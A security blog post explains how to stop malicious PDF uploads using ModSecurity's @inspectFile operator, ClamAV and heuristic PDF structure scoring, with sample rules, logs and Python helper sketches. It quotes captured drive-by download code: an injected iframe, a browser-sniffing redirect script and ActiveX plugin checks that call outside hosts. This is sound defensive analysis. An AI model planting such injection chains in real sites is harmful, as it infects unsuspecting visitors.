SpiderLabs Blog

Advanced Topic of the Week: Preventing Malicious PDF File Uploads

Many reports have indicated that malicious PDFs that exploit flaws in Adobe's Acrobat Reader are the top client-side attack vectors. As indicated in many news stories and backed up by the WASC WHID real-time reporting, the planting of malware on websites is a major problem for website owners. The last thing that they want to do is to serve malicious code to their clients. There are many different methods for adding malicious code to web applications including:

Speaking from first-hand knowledge gained from monitoring web-based honeypots, I can attest to the drive-by download methodology used in a majority of these attacks. The attackers initially inject a small JavaScript/iframe snippet into the application and then bounce the web requests around until they finally deliver the malicious code.

Initial injection into the index.html page:

document.writeln("<iframe  src='http://www.xxxxx9.cn/images/pic/84.htm' width='100' height='0'></iframe>");

This takes you to the 84.htm page, which checks the browser's User-Agent string and then redirects the user to the appropriate next page:

<script language="javascript" src="http://count11.51yes.com/click.aspx?id=110639713&logo=12" charset="gb2312"></script>
<script>
if(isFirefox=navigator.userAgent.indexOf("\x46\x69\x72\x65\x66\x6F\x78")>0)
  document.write("<iframe src=he.htm width=100 height=0></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65\x20\x37")==-1)
  document.write("<iframe width=100 height=0 src=test.htm></iframe>");
gggggg = "<iframe src=02.htm width=100 height=0></iframe>";
if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65\x20\x37")>0)
  document.write(gggggg);
document.write("<iframe src=pp.htm width=100 height=0></iframe>");
</script>
<script src="http://bgadf.cn/images/css/ads.js"></script>
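The User-Agent checks in the script above hide their search strings behind \xNN hex escapes. As a small aid for analysts, here is a minimal Python sketch that decodes them; the function name decode_hex_escapes is my own, not part of any tool mentioned in this post. The two strings decode to "Firefox" and "msie 7".

```python
import re


def decode_hex_escapes(text: str) -> str:
    """Replace every \\xNN escape in text with the character it encodes."""
    return re.sub(
        r"\\x([0-9A-Fa-f]{2})",
        lambda match: chr(int(match.group(1), 16)),
        text,
    )


# The two obfuscated strings copied from the 84.htm script.
FIREFOX_CHECK = r"\x46\x69\x72\x65\x66\x6F\x78"
MSIE7_CHECK = r"\x6D\x73\x69\x65\x20\x37"

if __name__ == "__main__":
    print(decode_hex_escapes(FIREFOX_CHECK))
    print(decode_hex_escapes(MSIE7_CHECK))
```

In other words, the page is simply branching on Firefox versus Internet Explorer 7 before choosing which iframe to write.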

This then leads to the pp.htm page, which checks for different browser plugins, including AcroPDF:

<script>
try{var a; var p=new ActiveXObject("AcroPDF.PDF.1");}
catch(a){};
finally{if(a!="[object Error]"){document.write("<iframe width=100 height=0 src=p.htm></iframe>");}}
try{var b; var ff=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=f.htm></iframe>");}}
try{var c; var f=new ActiveXObject("OWC10.Spreadsheet");}catch(c){};
finally{if(c!="[object Error]"){aacc = "<iframe src=of.htm width=111 height=111></iframe>"
setTimeout("document.write(aacc)", 10000 );}}
function Game()
{
Hdmddd = "IERPCtl.IERPC"+"tl.1";
try { Gime = new ActiveXObject(Hdmddd); }catch(error){return;}
Tellm = Gime.PlayerProperty("PRODUCTV"+"ERSION");
if(Tellm<="")
document.write("<iframe width=100 height=0 src=r.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=r.html></iframe>");
}
Game();
</script>

If your browser has the AcroPDF plugin, it is then sent to the p.htm page, which simply includes an iframe that downloads the final malicious PDF file, called "pef.pdf":

<iframe src=pef.pdf width=0 height=0></iframe>

A quick check on the VirusTotal website lists the following data:

Antivirus   Version   Last Update   Result
Sunbelt     6990      2010.10.05    Exploit.PDF-JS.Gen (v)

If you have not kept up with your Adobe Acrobat updates or, as seems to happen more and more frequently, the bad guys have 0-day PDF reader exploits, then your system will get pwned...

File Upload Abuse

While these attack vectors are prevalent, another common vector is to abuse an application's own file upload capability to plant malicious files on the site for other clients to download later. Allowing clients to upload files to your web application can cause big problems; however, many businesses require this functionality.

If you must allow for file uploads in your web application, I strongly encourage you to review the OWASP Unrestricted File Upload vulnerability page. While it is certainly possible to attack the web application platform itself, the salient point to highlight in this blog post is the following section:

Attacks on other systems

  • Upload .exe file into web tree - victims download trojaned executable
  • Upload virus infected file - victims' machines infected
  • Upload .html file containing script - victim experiences Cross-site Scripting (XSS)

This means that the end goal of the attack is to use the web application's own file upload mechanism to spread malicious files to other clients. So, the question then becomes "How can we analyze the file attachments being uploaded in order to prevent any malicious ones from making it into our web application?"

Don't be fooled into thinking that this is an easily solved question. Many business owners erroneously believe that you can use your standard AV software to scan the file. What they fail to grasp is that AV software typically only scans OS-level files, and these file attachments are usually transient in the HTTP transaction. They often traverse reverse proxy servers, load balancers, etc., until they are finally stored inside a database in a blob format. OS-level AV scanning won't really help in this situation. So how can we do AV scanning of HTTP file attachment uploads?

ModSecurity's @inspectFile operator provides the capability to extract file attachments so that they can be examined by OS-level validation tools. Older versions of ModSecurity also include a Perl script called modsec-clamscan.pl that can be used to have ClamAV scan the extracted file attachments. Keep in mind that you are not tied to using only ClamAV. You can use any script or tool that you want to inspect a file's contents. In this example, we will show the @inspectFile operator in action.

In my modsecurity_crs_15_customrules.conf file, I add this example rule:

SecRule FILES_TMPNAMES "@inspectFile base_rules/modsec-clamscan.pl" "phase:2,t:none,log,deny,msg:'Malicous File Attachment Identified.'"

I then need to update the modsec-clamscan.pl file to adjust settings for my local system and call the clamscan tool. Now, if a user uploads a malicious PDF file, such as the "pef.pdf" example I gathered from the web honeypots, it can be inspected by our modsec-clamscan.pl script. If we send a file attachment request with the pef.pdf file to our web server with the new rule, we will get a 403 Forbidden and see the following in the Apache error_log:

[Tue Oct 05 15:10:39 2010] [error] [client] ModSecurity: Access denied with code 403 (phase 2). File "/usr/local/apache/logs/uploads//20101005-151033-TKt4KcCoAWwAAQi@E78AAABA-file-x1hBCw" rejected by the approver script "/usr/local/apache/conf/modsec_current/base_rules/runav.pl": 0 clamscan: Exploit.PDF-72 [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"] [msg "Malicous File Attachment Identified."] [hostname "localhost"] [uri "/cgi-bin/fup.cgi"] [unique_id "TKt4KcCoAWwAAQi@E78AAABA"] 
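To make the approver script idea more concrete, here is a minimal Python sketch of what such a script could look like. It is not the Perl script that ships with ModSecurity. It assumes that ModSecurity passes the path of the extracted file as the first argument and reads the verdict from the script's standard output, that clamscan lives at /usr/bin/clamscan, and that clamscan exits with 0 for a clean file and 1 when a signature matches. The names CLAMSCAN and verdict_from_clamscan are mine.

```python
#!/usr/bin/env python3
import subprocess
import sys

CLAMSCAN = "/usr/bin/clamscan"  # assumption: adjust to the local install path


def verdict_from_clamscan(returncode: int, output: str) -> str:
    """Map a clamscan exit status and its output to an @inspectFile verdict line."""
    if returncode == 0:
        return "1 clamscan: OK"
    if returncode == 1:
        # clamscan reports a hit as "<path>: <signature> FOUND".
        for line in output.splitlines():
            if line.endswith(" FOUND"):
                signature = line.rsplit(": ", 1)[-1][: -len(" FOUND")]
                return f"0 clamscan: {signature}"
        return "0 clamscan: infected"
    # Any other exit status is a scanner error: fail closed and reject.
    return "0 clamscan: scan error"


def main(argv) -> None:
    if len(argv) != 2:
        print("0 clamscan: expected exactly one file argument")
        return
    try:
        result = subprocess.run(
            [CLAMSCAN, "--stdout", "--no-summary", argv[1]],
            capture_output=True,
            text=True,
        )
    except OSError:
        # The scanner binary is missing or not executable.
        print("0 clamscan: unable to run scanner")
        return
    print(verdict_from_clamscan(result.returncode, result.stdout))


if __name__ == "__main__":
    main(sys.argv)
```

The sketch rejects the upload whenever the scanner cannot be run or returns an unexpected status, on the theory that a broken scanner should not silently let files through. Whether that trade-off suits your site is a judgment call.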

Identifying Malicious PDFs Through Advanced PDF Structure Analysis

While ClamAV is an adequate free, open source option for AV scanning, the old adage holds true: you get what you pay for. PDF exploit development has advanced to such a degree that signature analysis alone is not sufficient to identify malicious files. What is needed is a heuristic analysis of the PDF structure to identify malicious characteristics. It just so happens that one of my colleagues here on the Trustwave SpiderLabs Research Team, Rodrigo (@spookerlabs) Montoro, has developed a really cool method based on this concept, and he will be presenting it at the upcoming Toorcon conference. Check out his blog post, which lists some surprisingly low detection rates for malicious PDFs from the AV software used by VirusTotal. He created a script that checks various PDF structures and scores the components. Here is an example of running his script against a malicious PDF that ClamAV did not trigger on:

Cross-Table must be bigger than 0
Suspect - Agenda.pdf with  xref 0

xref not equal startxref
Suspect - Agenda.pdf with  xref = 0 / startxref = 2

One Page only PDF
Suspect - Agenda.pdf with  /Page 1

ObjStm (possible Malware embedded) Detected
Suspect - Agenda.pdf with  /ObjStm 5

AcroForm Detected
Suspect - Agenda.pdf with  /AcroForm 1

EmbeddedFile Detected
Suspect - Agenda.pdf with  /EmbeddedFile 9

Agenda.pdf Malicious PDF Detected - Score: 16.6
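Rodrigo's script is not public, so the following is only a rough Python sketch of the general idea of structure scoring, not his method. It counts the same kinds of indicators that appear in the output above (xref versus startxref, single-page documents, /ObjStm, /AcroForm, /EmbeddedFile) in the raw bytes of the file. The weights, the threshold, and every name in the code are hypothetical and chosen purely for illustration.

```python
import re

# Hypothetical weights and threshold, chosen only to illustrate the idea.
WEIGHTS = {
    "no_xref": 1.0,
    "xref_mismatch": 1.0,
    "single_page": 1.0,
    "objstm": 2.0,
    "acroform": 1.0,
    "embedded_file": 2.0,
}
THRESHOLD = 3.0


def count_name(data: bytes, name: bytes) -> int:
    """Count a PDF name such as /Page, skipping longer names like /Pages."""
    return len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))


def score_pdf(data: bytes):
    """Return (score, findings) for the raw bytes of a PDF file."""
    # Count "xref" keywords that are not part of "startxref".
    xref = len(re.findall(rb"(?<!start)xref", data))
    startxref = len(re.findall(rb"startxref", data))
    checks = {
        "no_xref": xref == 0,
        "xref_mismatch": xref != startxref,
        "single_page": count_name(data, b"/Page") == 1,
        "objstm": count_name(data, b"/ObjStm") > 0,
        "acroform": count_name(data, b"/AcroForm") > 0,
        "embedded_file": count_name(data, b"/EmbeddedFile") > 0,
    }
    findings = [name for name, hit in checks.items() if hit]
    score = sum(WEIGHTS[name] for name in findings)
    return score, findings
```

A caller would read the uploaded file in binary mode, pass the bytes to score_pdf, and treat a score at or above THRESHOLD as suspicious. Plain byte matching like this will miss indicators hidden inside compressed streams, which is one reason a real analyzer needs to do considerably more work.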

So, if we want to apply this PDF analysis check to our uploaded files, we simply need to update the format of the script output for use with the ModSecurity @inspectFile operator. We need to make sure that the first character is a "1" if the file is not malicious and a "0" if it is malicious. After plugging the new script into my SecRule, here is what I get when trying to upload this new malicious PDF that was missed by ClamAV:

[Tue Oct 05 16:45:49 2010] [error] [client] ModSecurity: Access denied with code 403 (phase 2). File "/usr/local/apache/logs/uploads//20101005-164547-TKuOe8CoAWwAAQtvFKgAAACA-file-k6mpjv" rejected by the approver script "/usr/local/apache/conf/modsec_current/base_rules/pdf-analyze.pl": 0 pdfscan:  Malicious PDF Detected - Score: 2.6 [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"] [msg "Malicous PDF File Attachment Identified."] [hostname "localhost"] [uri "/cgi-bin/fup.cgi"] [unique_id "TKuOe8CoAWwAAQtvFKgAAACA"]
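The output adjustment described above can be sketched in a few lines of Python. This assumes that the analyzer prints a line containing "Malicious PDF Detected - Score: N" only for files it considers malicious, which is my reading of the sample output and not a documented contract. The names SCORE_LINE and inspectfile_verdict are hypothetical.

```python
import re

# Assumption: the analyzer emits this phrase only for files it flags.
SCORE_LINE = re.compile(r"Malicious PDF Detected - Score: (\d+(?:\.\d+)?)")


def inspectfile_verdict(analyzer_output: str) -> str:
    """Turn analyzer output into a line whose first character is 0 (reject) or 1 (approve)."""
    match = SCORE_LINE.search(analyzer_output)
    if match:
        return f"0 pdfscan: Malicious PDF Detected - Score: {match.group(1)}"
    return "1 pdfscan: OK"
```

A wrapper script would run the analyzer on the file path it receives, pass the captured output through inspectfile_verdict, and print the result. A production version should also reject the upload when the analyzer fails to run at all, since this sketch approves anything that does not produce the flagged line.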

So, as you can see, we can get more accurate results for identifying malicious PDF uploads than with other AV software. OK, now before you ask: Rodrigo's PDF analysis script is not ready for public release. It will be released by Trustwave SpiderLabs at some point in the future.

Keep in mind that the @inspectFile operator is simply a type of API that allows you to inspect file attachments. It is up to you to decide which type of program you would like to plug in and use.